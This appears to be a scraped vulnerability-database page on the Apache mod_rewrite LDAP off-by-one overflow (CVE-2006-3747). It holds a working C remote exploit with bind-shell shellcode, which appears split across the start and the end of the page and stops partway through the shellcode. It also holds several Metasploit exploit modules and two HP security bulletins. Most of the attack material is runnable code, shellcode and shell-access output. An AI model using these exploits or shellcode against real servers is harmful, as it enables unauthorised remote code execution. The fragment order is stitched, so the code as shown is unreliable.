"\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a"
"\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea"
"\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38"
"\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69"
"\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb"
"\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52"
"\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73"
"\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d"
"\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a"
"\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17"
"\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5"
"\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b"
"\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea"
"\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65"
"\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a";

int main(int argc, char *argv[])
{
    int sockfd, numbytes;  
    char buf[MAXDATASIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;
    printf("  Exploit: apache mod rewrite exploit (win32)\n"
           "       By: fabio/b0x (oc-192, old CoTS member)\n"
           "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n"
           );
    if (argc != 3) {
        printf("    Usage: ./apache hostname rewrite_path\n");
        exit(1);
    }
    printf("\n[+]Preparing payload\n");

    char payload[748];
    sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]);

    printf("[+]Connecting...\n");
    if ((he=gethostbyname(argv[1])) == NULL) {
        printf("[-]Cannot resolv hostname...\n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...\n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT);  
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connect\n");
        exit(1);
    }
   printf("[+]Connected\n[+]Sending...\n");
   if (send(sockfd, payload, strlen(payload), 0) == -1){
    printf("[-]Unable to send\n");
    exit(1);
   }
   printf("[+]Sent\n");
   close(sockfd);
   printf("[+]Starting second stage...\n");
   sleep(3);
    printf("[+]Connecting...\n");
    if ((he=gethostbyname(argv[1])) == NULL) { 
        printf("[-]Cannot resolv hostname...\n");
        exit(1);
    }
    if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
        printf("[-]Socket error...\n");
        exit(1);
    }

    their_addr.sin_family = AF_INET;   
    their_addr.sin_port = htons(PORT2);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero);
    if (connect(sockfd, (struct sockaddr *)&their_addr,
                                          sizeof(struct sockaddr)) == -1) {
        printf("[-]Unable to connect\n");
        exit(1);
    }
   printf("[+]Connected\n[+]Sending...\n");
   if (send(sockfd, payload2, strlen(payload2), 0) == -1){
    printf("[-]Unable to send\n");
    exit(1);
   }
   printf("[+]Sent\n[+]Connecting to shell\n");
   close(sockfd);


   sleep(3);
   int exec;
   char what[1024];
   sprintf(what," nc -w 10 %s 4445",argv[1]);
   exec=system(what);
   if (exec!=0){
    printf("[-]Not hacked\n");
   } else {
    printf("[+]Owned\n");
   }
   exit(1);
} 

// milw0rm.com [2007-05-26]
		

- 漏洞信息 (16752)

Apache module mod_rewrite LDAP protocol Buffer Overflow (EDBID:16752)
windows remote
2010-02-15 Verified
80 metasploit
[点击下载] [点击下载]
##
# $Id: apache_mod_rewrite_ldap.rb 8498 2010-02-15 00:48:03Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
			'Description'    => %q{
				This module exploits the mod_rewrite LDAP protocol scheme handling
				flaw discovered by Mark Dowd, which produces an off-by-one overflow.
				Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
				This module requires REWRITEPATH to be set accurately. In addition,
				the target must have 'RewriteEngine on' configured, with a specific
				'RewriteRule' condition enabled to allow for exploitation.

				The flaw affects multiple platforms, however this module currently
				only supports Windows based installations.
			},
			'Author'         => 'patrick',
			'Version'        => '$Revision: 8498 $',
			'References'     =>
				[
					[ 'CVE', '2006-3747' ],
					[ 'OSVDB', '27588' ],
					[ 'BID', '19204' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Platform'       => ['win'], # 'linux'],
			'Payload'        =>
				{
					'Space'    => 636,
					'BadChars' => "\x00\x0a\x0d\x20",
					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
					'StackAdjustment' => -3500,
					'DisableNops'  =>  'True',
				},
			'Targets'        =>
				[
					[  'Automatic', {} ], # patrickw tested OK 20090310 win32
				],
			'DisclosureDate' => 'Jul 28 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
				], self.class)
	end


	def check
		res = send_request_raw({
			'uri'     => '/',
			'version' => '1.1',
		}, 2)

		if (res.to_s =~ /Apache/) # This could be smarter.
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe

	end

	def exploit

		# On Linux Apache, it is possible to overwrite EIP by
		# sending ldap://<buf> ... TODO patrickw

		trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'

		print_status("Sending payload.")
		send_request_raw({
				'uri'     => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,
				'version' => '1.0',
				}, 2)
		handler
	end
end

		

- 漏洞信息 (F101257)

HP Security Bulletin HPSBOV02683 SSRT090208 (PacketStormID:F101257)
2011-05-10 00:00:00
HP  hp.com
advisory,web,denial of service,php,vulnerability
CVE-2002-0839,CVE-2002-0840,CVE-2003-0542,CVE-2004-0492,CVE-2005-2491,CVE-2005-3352,CVE-2005-3357,CVE-2006-2937,CVE-2006-2940,CVE-2006-3738,CVE-2006-3747,CVE-2006-3918,CVE-2006-4339,CVE-2006-4343,CVE-2007-5000,CVE-2007-6388,CVE-2008-0005,CVE-2009-1891,CVE-2009-3095,CVE-2009-3291,CVE-2009-3292,CVE-2009-3293,CVE-2009-3555,CVE-2010-0010
[点击下载]

HP Security Bulletin HPSBOV02683 SSRT090208 - Potential vulnerabilities have been identified with HP Secure Web Server (SWS) for OpenVMS running Apache and PHP. The vulnerabilities could be remotely exploited to create a Denial of Service (DoS), unauthorized access, unauthorized disclosure of information, or unauthorized modifications. Revision 1 of this advisory.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02824490
Version: 1

HPSBOV02683 SSRT090208 rev.1 - HP Secure Web Server (SWS) for OpenVMS running Apache/PHP, Remote Denial of Service (DoS), Unauthorized Access, Unauthorized Disclosure of Information, Unauthorized Modification

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2011-05-05
Last Updated: 2011-05-05

Potential Security Impact: Remote Denial of Service (DoS), unauthorized access, unauthorized disclosure of information, unauthorized modification

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential vulnerabilities have been identified with HP Secure Web Server (SWS) for OpenVMS running Apache and PHP. The vulnerabilities could be remotely exploited to create a Denial of Service (DoS), unauthorized access, unauthorized disclosure of information, or unauthorized modifications.

References: CVE-2002-0839, CVE-2002-0840, CVE-2003-0542, CVE-2004-0492, CVE-2005-2491, CVE-2005-3352, CVE-2005-3357, CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-3747, CVE-2006-3918, CVE-2006-4339, CVE-2006-4343, CVE-2007-5000, CVE-2007-6388, CVE-2008-0005, CVE-2009-1891, CVE-2009-3095, CVE-2009-3291, CVE-2009-3292, CVE-2009-3293, CVE-2009-3555, CVE-2010-0010

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Secure Web Server (SWS) for OpenVMS (based on Apache) V2.1-1 and earlier.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2002-0839    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2
CVE-2002-0840    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8
CVE-2003-0542    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2
CVE-2004-0492    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0
CVE-2005-2491    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5
CVE-2005-3352    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3
CVE-2005-3357    (AV:N/AC:H/Au:N/C:N/I:N/A:C)        5.4
CVE-2006-2937    (AV:N/AC:L/Au:N/C:N/I:N/A:C)        7.8
CVE-2006-2940    (AV:N/AC:L/Au:N/C:N/I:N/A:C)        7.8
CVE-2006-3738    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10.0
CVE-2006-3747    (AV:N/AC:H/Au:N/C:C/I:C/A:C)        7.6
CVE-2006-3918    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3
CVE-2006-4339    (AV:N/AC:M/Au:N/C:P/I:N/A:N)        4.3
CVE-2006-4343    (AV:N/AC:M/Au:N/C:N/I:N/A:P)        4.3
CVE-2007-5000    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3
CVE-2007-6388    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3
CVE-2008-0005    (AV:N/AC:M/Au:N/C:N/I:P/A:N)        4.3
CVE-2009-1891    (AV:N/AC:M/Au:N/C:N/I:N/A:C)        7.1
CVE-2009-3095    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5
CVE-2009-3291    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5
CVE-2009-3292    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5
CVE-2009-3293    (AV:N/AC:L/Au:N/C:P/I:P/A:P)        7.5
CVE-2009-3555    (AV:N/AC:M/Au:N/C:N/I:P/A:P)        5.8
CVE-2010-0010    (AV:N/AC:M/Au:N/C:P/I:P/A:P)        6.8
===========================================================
             Information on CVSS is documented
            in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following software updates available to resolve these vulnerabilities.

Kit Name
 Location

HP SWS V2.2 for OpenVMS Alpha and OpenVMS Integrity servers.
 http://h71000.www7.hp.com/openvms/products/ips/apache/csws.html

CSWS_PHP V2.2
 http://h71000.www7.hp.com/openvms/products/ips/apache/csws_php.html

HISTORY
Version:1 (rev.1) - 5 May 2011 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
    -check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
    -verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEUEARECAAYFAk3C8qwACgkQ4B86/C0qfVnBqgCYtJgc2OLmG0JEGU4sCpzntC4E
HACgjeWEt9Ja5qNdjhL5iwOp3JVtVic=
=EvRT
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F83108)

Apache module mod_rewrite LDAP protocol Buffer Overflow (PacketStormID:F83108)
2009-11-26 00:00:00
patrick  metasploit.com
exploit,overflow,protocol
windows
CVE-2006-3747
[点击下载]

This Metasploit module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This Metasploit module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apache module mod_rewrite LDAP protocol Buffer Overflow',
			'Description'    => %q{
				This module exploits the mod_rewrite LDAP protocol scheme handling
				flaw discovered by Mark Dowd, which produces an off-by-one overflow.
				Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.
				This module requires REWRITEPATH to be set accurately. In addition,
				the target must have 'RewriteEngine on' configured, with a specific
				'RewriteRule' condition enabled to allow for exploitation. 
				
				The flaw affects multiple platforms, however this module currently
				only supports Windows based installations.
			},
			'Author'         => 'patrick',
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-3747' ],
					[ 'OSVDB', '27588' ],
					[ 'BID', '19204' ],
					[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/3680' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/3996' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/2237' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Platform'       => ['win'], # 'linux'],
			'Payload'        =>
				{
					'Space'    => 636,
					'BadChars' => "\x00\x0a\x0d\x20",
					'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
					'StackAdjustment' => -3500,
					'DisableNops'  =>  'True',
				},
			'Targets'        => 
				[
					[  'Automatic', {} ], # patrickw tested OK 20090310 win32
				],
			'DisclosureDate' => 'Jul 28 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]),
				], self.class)
	end
	
	def autofilter
		return false
	end

	def check
		res = send_request_raw({
				'uri'     => '/',
				'version' => '1.1',
				}, 2)

		if (res.to_s =~ /Apache/) # This could be smarter.
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe

	end

	def exploit
		
		# On Linux Apache, it is possible to overwrite EIP by
		# sending ldap://<buf> ... TODO patrickw
		
		trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90'

		print_status("Sending payload.")
		send_request_raw({
				'uri'     => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded,
				'version' => '1.0',
				}, 2)
		handler
	end
end
    

- 漏洞信息 (F62377)

apache-mod-rewrite.rb.txt (PacketStormID:F62377)
2008-01-07 00:00:00
Marcin Kozlowski  
exploit,overflow
CVE-2006-3747
[点击下载]

Apache mod_rewrite escape_absolute_uri() off-by-one buffer overflow Metasploit exploit module. This affects Apache versions 1.3.28 through 1.3.36, 2.0.46 through 2.0.58, and 2.2.1 through 2.2.2.

require 'msf/core'

module Msf

class Exploits::Windows::Http::Apache_mod_rewrite < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Apache Mod_Rewrite escape_absolute_uri() Off-By-One Buffer Overflow',
			'Description'    => %q{
				This module exploits a off-by-one buffer overflow. RewriteRule must be enabled and rule must meets this criteria:
				*  beginning of the rewritten URL is controlled.
				*  flags on the rule do not include the Forbidden (F), Gone (G), or NoEscape (NE) flag
			},
			'Author'         => [ 'Marcin Kozlowski' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 0001 $',
			'References'     =>
				[
					['CVE', '2006-3747'],
					['BID', '19204'],
					['OSVDB', '27588'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'BadChars'    => "\x00",
					'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
					'DisableNops' => true,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
						['Apache 1.3 branch (>1.3.28 and <1.3.37), Apache 2.0 branch (2.0.46 and <2.0.59), Apache 2.2 branch (>2.2.0 and <2.2.3)', {'Ret' => 0x90909090 }], # our ret is NOP, since our shellcode is shortly after and will be execute next 
				],
			'DisclosureDate' => 'Aug 28 2006'))
			
			register_options(
				[
					OptString.new('REWRITEPATH', [true, "Rewrite path"]),
					Opt::RPORT(80) 
				], self.class )
	end

	def exploit
		connect

		rewritepath = datastore['REWRITEPATH']


		uri = "/#{rewritepath}/ldap://"+rand_text_alphanumeric(rand(16))+"/"+rand_text_alphanumeric(rand(32))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f"+rand_text_alphanumeric(rand(16))+"%3f"+rand_text_alphanumeric(rand(8))+"%3f%90"	
		uri += payload.encoded
		
		
		res = "GET #{uri} HTTP/1.0\r\n\r\n"
		print_status("Trying ...")
		sock.put(res)
		sock.close
		
		handler
		disconnect
	end



end
end	
    

- 漏洞信息 (F58346)

HP Security Bulletin 2006-12.75 (PacketStormID:F58346)
2007-08-08 00:00:00
Hewlett Packard  hp.com
advisory,vulnerability
CVE-2006-2937,CVE-2006-2940,CVE-2006-3738,CVE-2006-3747,CVE-2006-4339,CVE-2006-4343
[点击下载]

HP Security Bulletin - Potential security vulnerabilities have been identified HP System Management

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01118771
Version: 1

HPSBMA02250 SSRT061275 rev.1 - HP System Management Homepage (SMH) for Linux and Windows, Remote Execution of Arbitrary Code and Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2007-08-01
Last Updated: 2007-08-01


Potential Security Impact: Remote execution of arbitrary code and Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified HP System Management Homepage (SMH) for Linux and Windows. These vulnerabilities could by exploited remotely resulting in the execution of arbitrary code or a Denial of Service (DoS). 

References: CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-3747, CVE-2006-4339, CVE-2006-4343

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows.

BACKGROUND


RESOLUTION
HP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue. 
A more recent version is available: System Management Homepage (SMH) version 2.1.8 

HP System Management Homepage for Linux (x86) version 2.1.8-177 can be downloaded from 
http://h18023.www1.hp.com/support/files/server/us/download/26864.html 

HP System Management Homepage for Linux (AMD64/EM64T) version 2.1.8-177 can be downloaded from 
http://h18023.www1.hp.com/support/files/server/us/download/26866.html 

HP System Management Homepage for Windows version 2.1.8-179 can be downloaded from 
http://h18023.www1.hp.com/support/files/server/us/download/26977.html 

PRODUCT SPECIFIC INFORMATION 

HISTORY: 
Version:1 (rev.1) - 1 August 2007 Initial Release 

Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux 
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    

- 漏洞信息 (F56989)

apache2058-rewrite.txt (PacketStormID:F56989)
2007-05-31 00:00:00
fabio/b0x  
exploit,remote,overflow,shell
windows
CVE-2006-3747
[点击下载]

Apache version 2.0.58 mod_rewrite remote overflow exploit for win32. Binds a shell to port 4445.

/*
apache mod rewrite exploit (win32)

By: fabio/b0x (oc-192, old CoTS member)

Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded

Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003)
      original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also
      was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/

Usage: ./apache hostname rewrite_path

Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard

Example: ./apache 192.168.0.253 test
[+]Preparing payload
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Starting second stage...
[+]Connecting...
[+]Connected
[+]Sending...
[+]Sent
[+]Connecting to shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Apache Group\Apache2>exit
exit
[+]Owned
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 80 
#define PORT2 4444
#define MAXDATASIZE 1024
char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90";
char shellcode[]= 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42"
"\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56"
"\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c"
"\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61"
"\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c"
"\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e"
"\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70"
"\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68"
"\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31"
"\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a"
"\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67"
"\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76"
"\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65"
"\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74"
"\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35"
"\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44"
"\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33"
"\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69"
"\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33"
"\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54"
"\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52"
"\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49"
"\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74"
"\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75"
"\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e"
"\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b"
"\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47"
"\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76"
"\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50"
"\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66"
